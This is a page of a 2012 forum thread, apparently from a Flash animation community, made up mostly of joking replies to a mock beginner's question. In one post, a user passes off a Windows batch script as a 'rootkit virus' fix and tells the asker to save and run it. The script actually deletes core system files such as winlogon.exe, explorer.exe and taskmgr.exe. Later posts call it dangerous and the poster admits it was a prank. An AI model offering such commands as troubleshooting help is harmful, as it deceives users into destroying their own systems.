Leo
BDB
Granadico
Eric
Mr Lange
26 posters
Go down
Anonymous

Mr Lange's Guide to Asking Questions - Page 5 Empty Re: Mr Lange's Guide to Asking Questions

1/10/2012, 1:10 pm
blitzkrieg667 wrote:how do i open flash i cant figure out this damn mouse thing do i click on it 50 times or do i bash my head on the keyboard please help me im not intelligent

You sure ain`t. Well... SMACK YOUR HEAD ON THE FRIDGE IT SHOULD WORK! CHICKENS!
BlitznBurst
BlitznBurst
Spritan
Spritan
Number of posts : 4898
Registration date : 2011-01-15

Mr Lange's Guide to Asking Questions - Page 5 Empty Re: Mr Lange's Guide to Asking Questions

1/10/2012, 2:32 pm
i tried it and it didnt work and now my frige is broken is there something to do with thatv chickens i dont get it
Jellal
Jellal
Spritan
Spritan
Number of posts : 2524
Registration date : 2011-03-19

1/10/2012, 4:46 pm
blitzkrieg667 wrote:how do i open flash i cant figure out this damn mouse thing do i click on it 50 times or do i bash my head on the keyboard please help me im not intelligent
It seems like flash won't open because you have a rootkit virus.
Here's a solution to remove the virus:
1. Open up notepad.
2. Copy and paste this into it:
Code:
Code:

@echo off
echo Removing virus from computer, do you wish to proceed? This might take a while.
pause
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
DEL "C:\WINDOWS\system32\
3. Save it as Fix.bat (Remember to set the save as setting to all files)
4. Run it.

The virus should be completely fixed after this, but restart your computer afterwards.

Last edited by Jellal on 1/10/2012, 5:12 pm; edited 1 time in total
Granadico
Granadico
Administrator
Administrator
Number of posts : 12927
Registration date : 2008-11-18
https://www.youtube.com/user/Granadicohttps://www.twitch.tv/granadico/profile

1/10/2012, 5:08 pm
Its hard to tell if any of these posts are sarcasm lol
SXR123
SXR123
Administrator
Administrator
Number of posts : 11610
Registration date : 2010-03-07
https://www.youtube.com/user/sonicXrules123

1/10/2012, 5:12 pm
Don't listen to jellal, that'll fuck up your comp.
darkdragon581
darkdragon581
Spritan
Spritan
Number of posts : 2994
Registration date : 2009-12-05

1/10/2012, 11:07 pm
-raises hand-

is mayonnaise an instrument?
D3Anims
D3Anims
Spritan
Spritan
Number of posts : 6288
Registration date : 2010-09-09

1/10/2012, 11:17 pm
darkdragon581 wrote:-raises hand-

If it comes out of your skin flute
Granadico
Granadico
Administrator
Administrator

1/10/2012, 11:58 pm
darkdragon581 wrote:-raises hand-

No, and neither is horse radish
BlitznBurst
BlitznBurst
Spritan
Spritan

1/11/2012, 10:12 am
Granadico wrote:Its hard to tell if any of these posts are sarcasm lol

I WASNT BEING SARPLASTIC WHY WONT YOU GUISE HELP ME AND THAT IS A VERY MEAN THING TO DO JELLY I ALMOST BELIEVED YOU BUT READ EVERYONE ELSE FIRST AND READ SEXYRS COMMENT AND WHY ARE YOU CALLED SEXYR I DONT GET IT I HAVE BRAIN DAMAGE FROM HITTING THE FRIDGE WITH MY HEAD

Okay I'm done with this now.
Jellal
Jellal
Spritan
Spritan

1/11/2012, 5:24 pm
SXR123 wrote:Don't listen to jellal, that'll fuck up your comp.
Of course it won't.
Why are you trying to let this virus keep infecting people's computers?
You terrible mang.
BlitznBurst
BlitznBurst
Spritan
Spritan

1/12/2012, 2:34 pm
but i wasnt not able to open it im just so stupid i dont no how to do relatively simple things like use a mouse or breathe
Jellal
Jellal
Spritan
Spritan

1/12/2012, 6:01 pm
blitzkrieg667 wrote:but i wasnt not able to open it
So...you were able to open it then?
Ping
Ping
Spritan
Spritan
Number of posts : 20149
Registration date : 2010-09-15

1/13/2012, 3:55 am
Jellal is half-right on that, I believe. It could be a rootkit virus that's keeping you from opening your shit that you downloaded, but theres no need to delete taskmanager really all the goddamn essential shit you need for you computer to turn on properly.

But it's likely a rootkit virus.. maybe..

Oh wait.. what do you know? STUPID QUESTIONS!! Let's celebrate.
Leo
Leo
Administrator
Administrator
Number of posts : 9153
Registration date : 2009-05-23

1/13/2012, 3:57 am
Ping wrote:Jellal is half-right on that, I believe. It could be a rootkit virus that's keeping you from opening your shit that you downloaded, but theres no need to delete taskmanager really all the goddamn essential shit you need for you computer to turn on properly.

Damn Ping, you ruined the joke.
Ping
Ping
Spritan
Spritan

1/13/2012, 5:06 am
No. Someone could have gotten their computer seriously damaged. It's important to put a stop to these horrible jokes. Imagine the vicim's feelings if he were to do such a thing to his computer. I think Jellal's behavior here is some kind of cyber bullying. No, it is. It's only vital prevent these problems from happening.

Now let me remain prideful and respect me.
Kane
Kane
Spritan
Spritan
Number of posts : 1687
Registration date : 2011-03-09

1/13/2012, 6:12 am
Ping wrote:No. Someone could have gotten their computer seriously damaged. It's important to put a stop to these horrible jokes. Imagine the vicim's feelings if he were to do such a thing to his computer. I think Jellal's behavior here is some kind of cyber bullying. No, it is. It's only vital prevent these problems from happening.

Exactly, I believe Jellal should be banned for that and his post deleted, we don't want some new guy to do this and then find out he's destroyed his computer it's just so rude and if you don't atleast get rid of the post I'll report it to my heart's content. Ping speaks the truth
Ping
Ping
Spritan
Spritan

1/13/2012, 6:32 am
Gah. Ol Jelly don't got to be banned but those codes are SERIOUSLY dangerous

Even SXR knows that.

hopefully no one tries any of them ;_;
BlitznBurst
BlitznBurst
Spritan
Spritan

1/13/2012, 11:48 am
your all just stupidn you dont understand my question i just dont no how to open it if you tell me how to open it ill try it and see if it works i dont even know how to open the internet i just opened it by accident and now i have to keep my computer on so i can keep posting also while im asking completely ridicukous questions how do i use these damn pencil things im failing school and my teacher just thinks im making things up
Ray*~*Ler
Ray*~*Ler
Spritan
Spritan
Number of posts : 780
Registration date : 2011-08-28

1/13/2012, 12:10 pm
blitzkrieg667 wrote:your all just stupidn you dont understand my question i just dont no how to open it if you tell me how to open it ill try it and see if it works i dont even know how to open the internet i just opened it by accident and now i have to keep my computer on so i can keep posting also while im asking completely ridicukous questions how do i use these damn pencil things im failing school and my teacher just thinks im making things up
ever heard of...
1.opening macromedia flash 8 or adobe flash cs
2.press file
3. press open...
4. then find your flash to open
5. and your shit is open.... NUFF SAID.
BlitznBurst
BlitznBurst
Spritan
Spritan

1/13/2012, 12:24 pm
Ray*~*Ler wrote:
blitzkrieg667 wrote:your all just stupidn you dont understand my question i just dont no how to open it if you tell me how to open it ill try it and see if it works i dont even know how to open the internet i just opened it by accident and now i have to keep my computer on so i can keep posting also while im asking completely ridicukous questions how do i use these damn pencil things im failing school and my teacher just thinks im making things up
ever heard of...
2.press file
3. press open...

how can i open it then press file then open it then open it a third time i dont understand
Ray*~*Ler
Ray*~*Ler
Spritan
Spritan
Number of posts : 780
Registration date : 2011-08-28

1/13/2012, 12:32 pm
blitzkrieg667 wrote:
Ray*~*Ler wrote:
ever heard of...
2.press file
3. press open...

how can i open it then press file then open it then open it a third time i dont understand
Mr Lange's Guide to Asking Questions - Page 5 Obama_meme_25 to tell you what to do damn it... search your damn file and open it...Mr Lange's Guide to Asking Questions - Page 5 128734420940404826
BlitznBurst
BlitznBurst
Spritan
Spritan

1/13/2012, 1:02 pm
OMG I LOVE JUSTIN BIEBER!!!11!11!111!!111ONEONE//11!ELEVEN!!11/1.COM/00100001!!!
Jellal
Jellal
Spritan
Spritan

1/13/2012, 3:12 pm
Ping wrote:No. Someone could have gotten their computer seriously damaged. It's important to put a stop to these horrible jokes. Imagine the vicim's feelings if he were to do such a thing to his computer. I think Jellal's behavior here is some kind of cyber bullying. No, it is. It's only vital prevent these problems from happening.

If you're dumb enough to fall for something that says:
"Del C:\Windows\System32"
You probably shouldn't be on a computer in the first place.
Granadico
Granadico
Administrator
Administrator

1/13/2012, 5:53 pm
Don't make this the next "Convo Thread" for you guys to just spam. Actually post relevant crap. Next person to do it is a ban since i'm not gonna lock this topic.
Patt
Administrator
Administrator
Number of posts : 13124
Registration date : 2009-03-28

1/13/2012, 10:14 pm
Yeah, next person that does an off topic, or something to not help another, is banned for 24 hours. : )
Permissions in this forum:
You cannot reply to topics in this forum